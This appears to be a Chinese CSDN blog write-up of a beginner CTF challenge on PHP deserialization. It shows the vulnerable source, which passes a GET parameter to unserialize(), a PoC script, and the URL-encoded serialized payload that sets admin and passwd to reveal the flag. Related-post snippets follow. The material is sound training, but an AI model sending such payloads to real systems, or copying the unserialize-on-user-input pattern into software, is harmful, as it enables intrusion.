PHP反序列化

最新推荐文章于 2024-09-27 10:10:24 发布
最新推荐文章于 2024-09-27 10:10:24 发布
阅读量227 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxiaodi/article/details/131154185
版权

[SWPUCTF 2021 新生赛]ez_unserialize

题目代码

<?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

解题思路

分析代码可知,需要将构造函数中的变量进行修改,符合if条件之后可以得到flag

POC

<?php

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
$c=new wllm();
$c=serialize($c);
echo urlencode($c);


#O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D

cl1mb3r
关注
NSSCTF ez_unserialize
m0_49257076的博客
11-02 1167
打开题目是胡桃摇的表情包(手动滑稽????),下面是“题目在哪” 这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码 观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了) <?php class wllm{ public $admin; public $passwd; public function __construct(){ $this->admin ...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
CTF之反序列化练习
ZhangAweio的博客
04-17 233
看到中间的我我们只需要构造 admin = admin passwd = wllm就可以得到flag。绕过的姿势,只要是成员大于原来的成员都可以绕过这个函数,不会优先执行,很显然是错的答案,那我们试着寻找里面的哪个。那我们就要构造php反序列化。但是这题输出的既然是。
PHP之序列化与反序列化(基础篇)
errorr0
03-10 2558
最最最基础的序列化与反序列化
[SWPUCTF 2021 新生赛]ez_unserialize
最新发布
2301_79210256的博客
09-27 228
分析一下代码,error_reporting(0) 关闭了错误提醒 show_source("cl45s.php")显示当前文件源码,class wllm 定义了两个公共属性admin和passwd,以及一个构造函数_construct和一个析构函数_destruct(),定义了admin的初始值user和passwd的初始值123456。运行得到O:4:"wllm":2:{s:5:"admin";
php 反序列化漏洞
qq_45491553的博客
09-03 100
s:4:"wllm";} //注意末尾也有分号。由于_wakeup魔法函数中将admin的值进行sha1加密,故可尝试绕过_wakeup //(CVE-2016-7124)阅读代码,该程序从get请求中的获取一个参数p的值进行反序列化,故可在get中插入序列化后的结果进行反序列化漏洞的利用。
[SWPUCTF 2021 新生赛]WEB刷题记录
m0_73239569的博客
11-17 219
_destruct()方法在对象被销毁时自动调用,它检查admin属性是否为"admin"且passwd属性是否为"wllm",如果满足条件,则包含并输出flag.php文件中的内容;通过htaccess文件,可以帮助我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问,禁止目录列表,配置默认文档等功能。最后,通过$_GET['p']获取URL参数,并将其反序列化为一个对象,然后将其赋值给$Letmeseesee变量。常规思路,上传一个一句话木马<?
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-16
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想...
php反序列化例题.docx
07-18
PHP 反序列化详解 PHP 反序列化是指将序列化的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列化和反序列化的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 反序列化的过程...
详解php反序列化
10-15
PHP反序列化PHP编程中的一个重要概念,它涉及到将PHP变量从一种状态转换成另一种状态,即从内存中的表示形式转换成能够在文件或数据库中持久保存的格式,然后再将其还原回内存状态的过程。序列化操作可以通过PHP的...
PHP反序列化部分题目解析
LS_Sy的博客
02-17 541
稍加分析,我们可以知道在实现nss反序列化的同时,会触发__destruct()的魔术方法将lt的值赋给a,然后调用a中存储的函数,并将lly属性的值作为参数传递给该函数,由此我们想到把a变成system();this->lly变成ls就可以了。
PHP反序列化新手入门学习总结
蚁景网安学院
01-28 2957
最近写了点反序列化的题,才疏学浅,希望对CTF新手有所帮助,有啥错误还请大师傅们批评指正。首先我们需要理解什么是序列化,序列化是将变量或对象转换成字符串的过程,用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。
反序列化)[SWPUCTF 2021 新生赛]no_wakeup
weixin_73668856的博客
12-07 542
简单的
[PHP 反序列化参考手册]
cxiaodi的博客
02-16 1233
CTF中常见php反序列化模板题目总结
NSS刷web(1)
arcuied
06-19 455
nss刷web
记录第一次ctf比赛
姜小孩的博客
10-11 1327
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式,代码如下: <?php h
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值